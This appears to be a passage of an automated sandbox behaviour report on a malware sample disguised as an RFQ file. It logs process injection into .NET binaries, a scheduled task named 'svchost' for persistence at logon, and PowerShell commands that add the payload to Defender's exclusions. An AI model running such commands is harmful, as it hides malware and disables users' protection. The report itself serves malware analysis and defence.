                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 442000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 95A008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 442000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A45008
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 440000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 442000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: B94008
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7792 -ip 7792
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7792 -s 1152
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 508 -p 7872 -ip 7872
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7872 -s 1104
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 7748 -ip 7748
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7748 -s 1144
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 568 -p 8396 -ip 8396
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8396 -s 1352
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Queries volume information: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
